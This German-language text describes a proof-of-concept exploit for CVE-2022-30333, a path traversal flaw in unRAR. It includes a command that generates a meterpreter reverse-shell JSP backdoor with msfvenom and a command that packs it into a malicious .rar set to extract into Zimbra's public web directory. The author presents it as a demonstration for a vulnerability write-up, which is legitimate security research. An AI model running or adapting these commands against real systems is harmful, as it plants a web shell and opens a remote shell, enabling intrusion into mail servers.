
Proof-of-Concept-Exploit für CVE-2022-30333 Path Traversal in unRAR, der bösartige .rar-Dateien erzeugt, um beliebige Payloads an vom Angreifer festgelegte Speicherorte zu extrahieren.
Ein Proof-of-Concept für CVE-2022-30333 – eine Path-Traversal-Schwachstelle in unRAR-Versionen vor 6.11. Ich habe dies als Demonstration des Exploits für einen AttackerKB-Artikel erstellt und hoffe, es bald in ein Metasploit-Modul zu integrieren!
Im Grunde genommen geben Sie ein Ziel (einschließlich Pfadtraversal) und einige Dateidaten an, und dieses Tool generiert eine .rar-Datei, die diese Datei an diesen Ort extrahiert. Die maximale Dateilänge beträgt 104 Bytes und die maximale Dateilänge beträgt 4096 Bytes. (Das ist nicht intrinsisch für die Schwachstelle, es ist nur das, was ich gewählt habe, als ich die Datei generiert habe).
Erzeugen Sie zum Beispiel eine Backdoor mit msfvenom:
$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.146 -f jsp -o payload.jsp
Erstellen Sie dann eine .rar-Datei und platzieren Sie die .jsp an einen unterhaltsamen Ort:
$ ruby ./cve-2022-30333.rb '../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/backdoor.jsp' ./payload.jsp > file.rar